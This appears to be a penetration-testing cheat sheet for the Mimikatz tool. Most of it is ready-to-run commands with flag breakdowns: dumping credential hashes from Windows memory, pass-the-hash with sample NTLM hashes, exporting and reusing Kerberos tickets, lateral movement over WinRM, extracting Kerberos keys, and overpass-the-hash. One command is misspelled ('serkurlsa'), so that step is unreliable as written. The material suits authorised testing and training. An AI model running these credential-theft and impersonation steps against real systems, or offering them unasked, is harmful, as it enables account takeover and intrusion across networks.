Mimikatz
This section will cover ways to use Mimikatz.
Table of Contents
- Overview
- Dumping Hashes
- Pass the Hash
- Harvesting Kerberos Tickets
- Pass the Ticket
- Pass the Ticket using WinRM
- Extracting Kerberos Keys
- Pass the Key and OverPass the Hash
Overview
Mimikatz is a Windows exploitation tool that allows us to perform a wide range of tasks.
Dumping Hashes
To dump hashes with mimikatz, we can use the following commands.
mimikatz.exe
privilege::debug
token::elevate
serkurlsa::logonpasswords
Pass the Hash
We can use the following command to perform the attack.
mimikatz.exe privilege::debug "sekurlsa::pth /user:<username> /rc4:<password hash> /domain:<domain> /run:cmd.exe" exit
Command breakdown:
privilege::debug- Attempts to enable debug privilege to access certain system-level information.sekurlsa::pth- Specify to perform a pass the hash attack./user:<username>- Specify the username of the account to impersonate./rc4:<password hash>- Specify the NTLM hash of the target user./domain:<domain>- Specify the domain for the user account./run:cmd.exe- Specify the process to run with the impersonated credentials. In this example,cmd.exe.
An example will be:
mimikatz.exe privilege::debug "sekurlsa::pth /user:myuser /rc4:BCD82943C6AC81E7DFFBD85D253961FA /domain:acorp.lan /run:cmd.exe" exit
Command breakdown:
privilege::debug- Attempts to enable debug privilege to access certain system-level information.sekurlsa::pth- Specify to perform a pass the hash attack./user:myuser- Specify the username of the account to impersonate./rc4:BCD82943C6AC81E7DFFBD85D253961FA- Specify the NTLM hash of the target user./domain:acorp.lan- Specify the domain for the user account./run:cmd.exe- Specify the process to run with the impersonated credentials. In this example,cmd.exe.
Harvesting Kerberos Tickets
We can use the sekurlsa::tickets /export module to export the tickets on a system. The files will be saved with a .kirbi extension.
mimikatz.exe
privilege::debug
sekurlsa::tickets /export
Tickets that has a $ at the end of the username means that it is a computer account. The file will have the following format:
<random value>-username@<service domain>.local.kirbi
Pass the Ticket
We can use the kerberos::ptt module and the exported tickets to perform Pass the Ticket attacks.
privilege::debug
kerberos::ptt "path\to\exported\tickets"
Commands breakdown:
kerberos::ptt- Specify to use thepttmodule."path\to\exported\tickets"- Specify the path of the exported ticket to use.
An example will be:
privilege::debug
kerberos::ptt "C:\<ticket name>.kirbi"
Pass the Ticket using WinRM
We can use the kerberos::ptt module in Mimikatz and the PowerShell command Enter-PSSession to connect to the target machine with the same session.
This can allow us to move laterally using the initial machine as a foothold.
Mimikatz:
privilege::debug
kerberos::ptt "path\to\exported\tickets"
exit
Command line:
powershell
Enter-PSSession -ComputerName <Computer Name>
Extracting Kerberos Keys
We can use the following commands to enumerate and dump all user Kerberos encryption keys.
privilege::debug
sekurlsa::ekeys
Once the AES256_HMAC or RC4_HMAC keys are obtained, we can perform OverPass the Hash or Pass the Key attacks using Mimikatz and Rubeus.
Pass the Key and OverPass the Hash
We can use the following commands in Mimikatz.
privilege::debug
sekurlsa::pth /domain:<domain> /user:<username> /ntlm:<key hash>
Command breakdown:
/domain:<domain>- Specify the domain./user:<username>- Specify the username to use for authentication./ntlm:<key hash>- Specify the key hash value to use for authentication.
An example will be:
privilege::debug
sekurlsa::pth /domain:acorp.lan /user:myuser /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f
This will create a new cmd.exe window that we can use to request access to any service we want using the target user.
Note that administrative rights are required to perform this.